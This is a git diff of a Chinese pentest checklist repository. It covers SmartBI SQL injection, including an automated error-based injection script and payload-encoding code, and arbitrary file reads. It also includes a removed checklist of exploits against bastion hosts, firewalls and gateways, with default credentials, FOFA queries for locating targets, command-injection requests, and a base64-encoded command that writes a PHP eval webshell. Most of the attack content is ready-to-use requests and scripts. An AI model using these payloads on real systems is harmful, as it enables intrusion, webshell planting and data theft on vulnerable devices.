VM/am/m9/VK/aM/OT/Ou/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/JT&pageId=0&writeBackData=&exportSheetIndexes=&exportId=&op=%7B%22getTotalPages%22%3Atrue%2C%22sheetPageCounts%22%3A%5B1%5D%7D
 ```
 #### 0x01 解码并修改数据包直接注入
 修改 paramsInfoEncode 为 paramsInfo，将 Encode 参数去掉（以下payload 可直接使用）：
 ```
 POST /vision/ssreportServlet HTTP/1.1
 Host: 127.0.0.1
 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 Referer: https://127.0.0.1/vision/openresource.jsp?iPad=true&refresh=true&showtoolbar=false&showPath=false&resid=I40281d81016a8bc28bc20231016aaee007b230ac&_timestamp=1610433924926
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 3282
 Authorization: Basic YWRtaW46YWRtaW4=
 Connection: close
 Cookie: FQPassword=; JSESSIONID=4BB550BF10C606619B753D3CE52CD3AB
 Upgrade-Insecure-Requests: 1
 sheetIndex=0&resid=I40281d81016a8bc28bc20231016aaee007b230ac&clientId=Iff8080810176f0c7f0c7544f0176f54eb72c1160&refreshType=refresh&paramsInfo=%5B%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E5%8D%95%E4%BD%8D%E5%90%8D%E7%A7%B0%22%2C%22name%22%3A%22%E5%8D%95%E4%BD%8D%E5%90%8D%E7%A7%B0%22%2C%22alias%22%3A%22%E5%8D%95%E4%BD%8D%E5%90%8D%E7%A7%B0%22%2C%22value%22%3A%22'11111%22%2C%22displayValue%22%3A%22'11111%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%B1%9E%E6%9C%BA%E6%9E%84%22%2C%22name%22%3A%22%E6%89%80%E5%B1%9E%E6%9C%BA%E6%9E%84%22%2C%22alias%22%3A%22%E6%89%80%E5%B1%9E%E6%9C%BA%E6%9E%84%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%9C%A8%E7%9C%81%E4%BB%BD%22%2C%22name%22%3A%22%E6%89%80%E5%9C%A8%E7%9C%81%E4%BB%BD%22%2C%22alias%22%3A%22%E6%89%80%E5%9C%A8%E7%9C%81%E4%BB%BD%22%2C%22value%22%3A%22440000%22%2C%22displayValue%22%3A%22%E5%B9%BF%E4%B8%9C%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%9C%A8%E5%9C%B0%E5%B8%82%22%2C%22name%22%3A%22%E6%89%80%E5%9C%A8%E5%9C%B0%E5%B8%82%22%2C%22alias%22%3A%22%E6%89%80%E5%9C%A8%E5%9C%B0%E5%B8%82%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%E5%85%A8%E9%83%A8%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%9C%A8%E5%8C%BA%E5%8E%BF%22%2C%22name%22%3A%22%E6%89%80%E5%9C%A8%E5%8C%BA%E5%8E%BF%22%2C%22alias%22%3A%22%E6%89%80%E5%9C%A8%E5%8C%BA%E5%8E%BF%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%E5%85%A8%E9%83%A8%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.id%22%2C%22name%22%3A%22id%22%2C%22alias%22%3A%22%E6%A3%80%E6%B5%8B%E6%9C%BA%E6%9E%84id%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22name%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22alias%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22name%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22alias%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22name%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22alias%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22name%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22alias%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%5D&pageId=0&writeBackData=&exportSheetIndexes=&exportId=&op=%7B%22getTotalPages%22%3Atrue%2C%22sheetPageCounts%22%3A%5B1%5D%7D
 ```
 #### 0x02 RMIServet加密后注入
 报错注入脚本：
 ```
 #coding=utf-8
 import requests
 from urllib.parse import quote,unquote
 import re
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 #去除https的warning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 ENCODING_SCHEDULE = {
    "0": "7", "1": "1", "2": "u", "3": "N", "4": "K", "5": "J", "6": "M", "7": "9", "8": "'", "9": "m", "!": "P",
    "%": "/", "'": "n", "(": "A", ")": "E", "*": "s", "+": "+", "-": "f", ".": "q", "A": "O", "B": "V", "C": "t",
    "D": "T", "E": "a", "F": "x", "G": "H", "H": "r", "I": "c", "J": "v", "K": "l", "L": "8", "M": "F", "N": "3",
    "O": "o", "P": "L", "Q": "Y", "R": "j", "S": "W", "T": "*", "U": "z", "V": "Z", "W": "!", "X": "B", "Y": ")",
    "Z": "U", "a": "(", "b": "~", "c": "i", "d": "h", "e": "p", "f": "_", "g": "-", "h": "I", "i": "R", "j": ".",
    "k": "G", "l": "S", "m": "d", "n": "6", "o": "w", "p": "5", "q": "0", "r": "4", "s": "D", "t": "k", "u": "Q",
    "v": "g", "w": "b", "x": "C", "y": "2", "z": "X", "~": "e", "_": "y",
 }
 DECODING_SCHEDULE = {
    "7": "0", "1": "1", "u": "2", "N": "3", "K": "4", "J": "5", "M": "6", "9": "7", "'": "8", "m": "9", "P": "!",
    "/": "%", "n": "'", "A": "(", "E": ")", "s": "*", "+": "+", "f": "-", "q": ".", "O": "A", "V": "B", "t": "C",
    "T": "D", "a": "E", "x": "F", "H": "G", "r": "H", "c": "I", "v": "J", "l": "K", "8": "L", "F": "M", "3": "N",
    "o": "O", "L": "P", "Y": "Q", "j": "R", "W": "S", "*": "T", "z": "U", "Z": "V", "!": "W", "B": "X", ")": "Y",
    "U": "Z", "(": "a", "~": "b", "i": "c", "h": "d", "p": "e", "_": "f", "-": "g", "I": "h", "R": "i", ".": "j",
    "G": "k", "S": "l", "d": "m", "6": "n", "w": "o", "5": "p", "0": "q", "4": "r", "D": "s", "k": "t", "Q": "u",
    "g": "v", "b": "w", "C": "x", "2": "y", "X": "z", "e": "~", "y": "_",
 }
 #此函数可以用来加密明文也可以解密服务器返回的密文
 def encode(code):
    out = ""
    for item in code:
        out = out + ENCODING_SCHEDULE.get(item, item)
    return out
 def decode(code):
    out = ""
    for item in code:
        out = out + DECODING_SCHEDULE.get(item, item)
    return out
 url = "https://127.0.0.1/vision/ssreportServlet"
 headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36",
           "Accept-Encoding":"gzip, deflate",
           "Content-Type":"application/x-www-form-urlencoded",
           "Cookie":"JSESSIONID=4BB550BF10C606619B753D3CE52CD3AB"
           }
 origin1 = '''[{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.单位名称","name":"单位名称","alias":"单位名称","value":"'''
 origin2 = '''","displayValue":"'''
 origin3 = '''"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所属机构","name":"所属机构","alias":"所属机构","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所在省份","name":"所在省份","alias":"所在省份","value":"440000","displayValue":"广东"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所在地市","name":"所在地市","alias":"所在地市","value":"","displayValue":"全部"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所在区县","name":"所在区县","alias":"所在区县","value":"","displayValue":"全部"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.id","name":"id","alias":"检测机构id","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.填报时间起","name":"填报时间起","alias":"填报时间起","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.填报时间止","name":"填报时间止","alias":" 填报时间止","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.更新时间起","name":"更新时间起","alias":"更新时间起","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.更新时间止","name":"更新时间止","alias":"更新时间止","value":"","displayValue":""}]'''
 for i in range(1,20):
    payload = "%' and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit {0},1),0x7e)) and null = '%".format(i)
    # print(payload)
    origin_full = origin1 + payload + origin2 + payload + origin3
    # print(origin_full)
    url_encode_full = quote(origin_full)
    # print(url_encode_full)
    rmi_encode = encode(url_encode_full)
    # print(rmi_encode)
    encode_final = 'encode='+rmi_encode
    data = {
        "resid":"I40281d81016a8bc28bc20231016aaee007b230ac",
        "clientId":"Iff8080810176f0c7f0c7544f0176f54eb72c1160",
        "refreshType":"refresh",
        "paramsInfoEncode":encode_final
    }
    #proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
    r = requests.post(url,data=data,headers=headers,verify=False)
    #print(r.text)
    regex = r"~\w+~"
    match = re.search(regex,r.text).span() #返回第一个匹配到的结果的位置（1000,1005）
    database = r.text[match[0]+1:match[1]-1]
    print(r.text[match[0]:match[1]])
    with open('file.txt','a+') as f:
        f.write(database+'\n')
 ```
 ## 五、任意文件读取
 V85以下的可能任意文件下载都有，V95版本不存在。
 ```
 https://127.0.0.1/vision/FileServlet?ftpType=out&path=upload/../../../../../../../../../../etc/passwd&name=%E4%B8%AD%E5%9B%BD%E7%9F%B3%E6%B2%B9%E5%90%89%E6%9E%97%E7%99%BD%E5%9F%8E%E9%94%80%E5%94%AE%E5%88%86%E5%85%AC%E5%8F%B8XX%E5%8A%A0%E6%B2%B9%E7%AB%99%E9%98%B2%E9%9B%B7%E5%AE%89%E5%85%A8%E5%BA%94%E6%80%A5%E9%A2%84%E6%A1%88.docx
 ```
 ## 附录、RMIServet加解密
 SmartBi 有两种传参方式，RMIServlet 加密或直接传输。
 ### 0x01 RMIServlet加密
 ```
 POST /vision/RMIServlet HTTP/1.1
 Host: 127.0.0.1
 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
 Accept: */*
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 Referer: https://127.0.0.1/vision/index.jsp
 If-Modified-Since: 0
 Content-Type: application/x-www-form-urlencoded;charset=UTF-8
 Content-Length: 148
 Authorization: Basic YWRtaW46YWRtaW4=
 Connection: close
 Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299
 encode=zDp4Wp4gRip+Q5h(kpzDp4xw4tI(6-p+/JV/uuc'(mKi(Kp719J(~K((~K(((pm719JhNp'uKiMM('9/uu/ut/uuXIw6--Qw1/uu/ut/uu6QSS/uu/ut/uuY!a0bp1uN/uu/utk4Qp/JT
 ```
 ### 0x02 直接传输
 上述encode加密字段解密后为：
 ```
 UserService+updateUserForChange+["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true]
 ```
 等同于：
 ```
 className=UserService&methodName=updateUserForChange&params=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true]
 ```
 构造数据包：
 ```
 POST /vision/RMIServlet HTTP/1.1
 Host: 127.0.0.1
 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
 Accept: */*
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 Referer: https://127.0.0.1/vision/index.jsp
 If-Modified-Since: 0
 Content-Type: application/x-www-form-urlencoded;charset=UTF-8
 Content-Length: 148
 Authorization: Basic YWRtaW46YWRtaW4=
 Connection: close
 Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299
 className=UserService&methodName=updateUserForChange&params=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true]
 ```
 ### 0x03 RMIServet加解密脚本
 ```python
 from urllib.parse import unquote
 from urllib.parse import quote
 ENCODING_SCHEDULE = {
    "0": "7", "1": "1", "2": "u", "3": "N", "4": "K", "5": "J", "6": "M", "7": "9", "8": "'", "9": "m", "!": "P", 
    "%": "/", "'": "n", "(": "A", ")": "E", "*": "s", "+": "+", "-": "f", ".": "q", "A": "O", "B": "V", "C": "t", 
    "D": "T", "E": "a", "F": "x", "G": "H", "H": "r", "I": "c", "J": "v", "K": "l", "L": "8", "M": "F", "N": "3", 
    "O": "o", "P": "L", "Q": "Y", "R": "j", "S": "W", "T": "*", "U": "z", "V": "Z", "W": "!", "X": "B", "Y": ")", 
    "Z": "U", "a": "(", "b": "~", "c": "i", "d": "h", "e": "p", "f": "_", "g": "-", "h": "I", "i": "R", "j": ".", 
    "k": "G", "l": "S", "m": "d", "n": "6", "o": "w", "p": "5", "q": "0", "r": "4", "s": "D", "t": "k", "u": "Q", 
    "v": "g", "w": "b", "x": "C", "y": "2", "z": "X", "~": "e", "_": "y", 
 }
 DECODING_SCHEDULE = {
    "7": "0", "1": "1", "u": "2", "N": "3", "K": "4", "J": "5", "M": "6", "9": "7", "'": "8", "m": "9", "P": "!", 
    "/": "%", "n": "'", "A": "(", "E": ")", "s": "*", "+": "+", "f": "-", "q": ".", "O": "A", "V": "B", "t": "C", 
    "T": "D", "a": "E", "x": "F", "H": "G", "r": "H", "c": "I", "v": "J", "l": "K", "8": "L", "F": "M", "3": "N", 
    "o": "O", "L": "P", "Y": "Q", "j": "R", "W": "S", "*": "T", "z": "U", "Z": "V", "!": "W", "B": "X", ")": "Y", 
    "U": "Z", "(": "a", "~": "b", "i": "c", "h": "d", "p": "e", "_": "f", "-": "g", "I": "h", "R": "i", ".": "j", 
    "G": "k", "S": "l", "d": "m", "6": "n", "w": "o", "5": "p", "0": "q", "4": "r", "D": "s", "k": "t", "Q": "u", 
    "g": "v", "b": "w", "C": "x", "2": "y", "X": "z", "e": "~", "y": "_", 
 }
 #此函数可以用来加密明文也可以解密服务器返回的密文
 def encode(code):
    out = ""
    for item in code:
        out = out + ENCODING_SCHEDULE.get(item, item)
    return out
 def decode(code):
    out = ""
    for item in code:
        out = out + DECODING_SCHEDULE.get(item, item)
    return out
 def read():
    with open('read.txt', 'r') as f:
        return f.read()
 a=read()
 b = decode(a)
 c = encode(a)
 print('Input:     ' + a + '\n')
 print('decode:    ' + b + '\n')
 print('decode-unquote-url:   '+unquote(b,'utf-8'))
 print('encode:   '+c)
 ```
 注：加密和解密的过程就是替换字符的过程，最终解密得到的是 url 编码，加密时传入的文本也要是 url 编码。
--- a/CHECKLIST/images/image-20230609142007526.png
+++ b/CHECKLIST/images/image-20230609142007526.png
--- a/CHECKLIST/images/image-20230609143031183.png
+++ b/CHECKLIST/images/image-20230609143031183.png
--- a/CHECKLIST/images/image-20230609143105272.png
+++ b/CHECKLIST/images/image-20230609143105272.png
--- a/CHECKLIST/images/image-20230609155053114.png
+++ b/CHECKLIST/images/image-20230609155053114.png
--- a/CHECKLIST/images/image-20230609155124566.png
+++ b/CHECKLIST/images/image-20230609155124566.png
--- a/CHECKLIST/images/image-20230609155215648.png
+++ b/CHECKLIST/images/image-20230609155215648.png
--- a/CHECKLIST/images/image-20230609161347780.png
+++ b/CHECKLIST/images/image-20230609161347780.png
--- a/CHECKLIST/images/image-20230609161814152.png
+++ b/CHECKLIST/images/image-20230609161814152.png
--- a/CHECKLIST/images/image-20230717111349311.png
+++ b/CHECKLIST/images/image-20230717111349311.png
--- a/CHECKLIST/安全设备漏洞
+++ b/CHECKLIST/安全设备漏洞
@ -1,865 +0,0 @@
 # 安全设备漏洞 Checklist
 更新时间：2023.06
 ##### **【免责声明】本项目所涉及的技术、思路和工具仅供学习，任何人不得将其用于非法用途和盈利，不得将其用于非授权渗透测试，否则后果自行承担，与本项目无关。使用本项目前请先阅读 [法律法规](https://github.com/Threekiii/Awesome-Laws)。**
 &#x2705; 表示漏洞文档已收录 [Vulnerability-Wiki]( https://github.com/Threekiii/Vulnerability-Wiki) 漏洞库，仅收录2022/2023年部分安全设备，全部 iot 漏洞列表见 [README.md](https://github.com/Threekiii/Vulnerability-Wiki/blob/master/docs-base/docs/iot/README.md)。参考阅读：[ffffffff0x/SecDevice-Exploits](https://github.com/ffffffff0x/1earn/blob/master/1earn/Security/RedTeam/%E5%AE%89%E9%98%B2%E8%AE%BE%E5%A4%87/SecDevice-Exploits.md#%E9%BD%90%E6%B2%BB%E5%A0%A1%E5%9E%92%E6%9C%BA)
 ## 一、身份与访问控制
 ### 0x01 堡垒机
 #### 齐智堡垒机
 FOFA：
 ```
 app="齐治科技-堡垒机" 
 ```
 ##### 默认口令
 ```
 shterm/shterm
 ```
 ##### shterm命令执行 tui.update.php
 ```
 POST /shterm/listener/tui_update.php
 a=["t';import os;os.popen('whoami')#"]
 ```
 ##### 前台命令执行 cluster_manage.php CNVD-2019-20835
 访问以下路径，返回 ok：
 ```
 http://10.20.10.11/listener/cluster_manage.php
 ```
 写入webshell：
 ```
 /var/www/shterm/resources/qrcode/lbj77.php  密码10086
 ```
 ```
 https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
 ```
 ##### 后台命令执行 data_provider.php CNVD-2019-17294
 ```
 POST /audit/data_provider.php?ds_y=2019&ds_m=03&ds_d=02&ds_hour=01&ds_min=40&server_cond=&service=`id`&identity_cond=&query_type=all&format=json&browse=true
 Host: your-ip
 page=1&rp=30&sortname=stampl&sortorder=desc&query=&qtype=
 ```
 ##### 任意用户登录
 ```
 /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
 ```
 #### H3C SecPath
 FOFA：
 ```
 app="H3C-SecPath-运维审计系统" && body="2018"
 ```
 #### Teleport 堡垒机
 FOFA：
 ```
 app="TELEPORT堡垒机"
 ```
 ##### 任意用户登录
 返回 code 为 0 说明成功，刷新首页即可进入后台：
 ```
 POST /auth/do-login
 args={"type":2,"username":"admin","password":null,"captcha":"xxxx","oath":"","remember":false}
 ```
 ##### 后台文件读取
 ```
 /audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&amp;offset=0
 ```
 ### 0x02 IMC
 #### H3C IMC 智能管理中心
 FOFA：
 ```
 "/imc/javax.faces.resource/images/login_logo_h3c.png.jsf?ln=primefaces-imc-new-webui"
 ```
 ```
 body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui"
 ```
 ```
 body="iMC来宾接入自助管理系统"
 ```
 ##### 远程代码执行
 ```
 POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
 Host: xxx.xxx.xxx.xxx
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 1567
 pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami
 ```
 ## 二、网络检测与响应
 ### 0x01 蜜罐
 ### 0x02 IDS
 #### 绿盟 UTS 综合威胁探针
 ##### 管理员任意登录
 输入 admin/任意密码，点击登录。更改响应包，将 {"status":false,...} 中的 false 改为 true，此时，响应包将泄露 admin 用户密码的 md5 值。
 利用 md5 值登录页面：
 ```
 POST /webapi/v1/authen_user
 {"username":"admin","password":md5}
 ```
 ### 0x03 防火墙
 #### 安恒 明御WEB应用防火墙 
 FOFA：
 ```
 app="安恒信息-明御WAF"
 ```
 ##### report.php 任意用户登录✅
 漏洞指纹：
 ```
 /report.m?a=rpc-timed
 /system.m?a=reserved
 ```
 #### Cisco ASA
 ```
 app="CISCO-ASA-5520"
 ```
 ##### 拒绝服务/敏感信息获取 CVE-2018-0296
 exp：
 - https://github.com/yassineaboukir/CVE-2018-0296
 - https://github.com/milo2012/CVE-2018-0296
 ##### 任意文件删除 CVE-2020-3187
 exp：
 - https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html
 ##### 目录穿越/任意文件读取 CVE-2020-3452
 漏洞影响
 ```
 Cisco ASA 设备影响版本：
 <9.6.1
 9.6 < 9.6.4.42
 9.71
 9.8 < 9.8.4.20
 9.9 < 9.9.2.74
 9.10 < 9.10.1.42
 9.12 < 9.12.3.12
 9.13 < 9.13.1.10
 9.14 < 9.14.1.10
 ```
 ```
 /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
 ```
 #### H3C SecPath下一代防火墙
 FOFA：
 ```
 title="Web user login"
 ```
 ##### 任意文件下载 ✅
 ```
 /webui/?g=sys_dia_data_check&file_name=../../etc/passwd
 ```
 ```
 /webui/?
 g=sys_capture_file_download&name=../../../../../../../../etc/passwd
 ```
 #### 奇安信 网康下一代防火墙
 FOFA：
 ```
 app="网康科技-下一代防火墙"
 ```
 ##### 远程命令执行 ✅
 ```
 POST /directdata/direct/router HTTP/1.1
 {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
 ```
 访问：
 ```
 https://x.x.x.x/test_test.txt
 ```
 #### 启明星辰 天清汉马USG防火墙
 ##### 默认口令
 ```
 useradmin/venus.user
 ```
 #### 佑友防火墙
 ##### 默认口令
 ```
 admin/hicomadmin
 ```
 ##### 后台命令执行
 ```
 系统管理 --> 维护工具 --> Ping
 127.0.0.1|cat /etc/passwd
 ```
 #### ZeroShell
 FOFA：
 ```
 app="Zeroshell-防火墙"
 ```
 ##### ZeroShell 3.9.0 cgi-bin/kerbynet 命令执行
 exp：
 - https://www.exploit-db.com/exploits/49096
 ### 0x04 网关
 #### 奇安信 网康 NS-ASG 安全网关
 FOFA：
 ```
 网康 NS-ASG 安全网关
 ```
 ##### 任意文件读取 ✅
 ```
 /admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
 ```
 #### 安恒 明御安全网关 
 ##### 命令执行/任意文件读取✅
 漏洞指纹：
 ```
 /webui/?g=aaa_portal_auth_local_submit&suffix=
 /webui/?g=sys_dia_data_down&file_name=
 /webui/?g=sys_dia_data_check&file_name=
 ...
 ```
 #### 锐捷 EG 易网关
 ##### 管理员账号密码泄露 ✅
 获取账号密码：
 ```
 POST /login.php HTTP/1.1
 Host: 
 User-Agent: Go-http-client/1.1
 Content-Length: 49
 Content-Type: application/x-www-form-urlencoded
 X-Requested-With: XMLHttpRequest
 Accept-Encoding: gzip
 username=admin&password=admin?show+webmaster+user
 ```
 ##### branch_passw.php 远程命令执行 ✅
 发送请求包：
 ```
 POST /itbox_pi/branch_passw.php?a=set HTTP/1.1
 Host: 
 User-Agent: Go-http-client/1.1
 Content-Length: 41
 Content-Type: application/x-www-form-urlencoded
 Cookie: RUIJIEID=52222egp72ilkpf2de7qbrigk3;user=admin;
 X-Requested-With: XMLHttpRequest
 Accept-Encoding: gzip
 pass=|cat /etc/psswd>../test_test.txt
 ```
 再访问：
 ```
 http://your-ip/test_test.txt
 ```
 ##### cli.php 远程命令执行 ✅
 发送请求包：
 ```
 POST /cli.php?a=shell HTTP/1.1
 Host: 
 User-Agent: Go-http-client/1.1
 Content-Length: 24
 Content-Type: application/x-www-form-urlencoded
 Cookie: RUIJIEID=nk5erth9i0pvcco3n7fbpa9bi0;user=admin; 
 X-Requested-With: XMLHttpRequest
 Accept-Encoding: gzip
 notdelay=true&command=id
 ```
 ##### download.php 任意文件读取 ✅
 poc：
 ```
 /download.php?a=read_txt&file=../../../../etc/passwd
 ```
 #### 锐捷 ISG 视频接入安全网关
 ##### 账号密码泄露漏洞 ✅
 FOFA：
 ```
 title="RG-ISG"
 ```
 F12 查看到账号密码，解密md5 后登陆系统。
 ### 0x05 路由器
 #### D-Link DAP-2020
 FOFA：
 ```
 body="DAP-1360" && body="6.05"
 ```
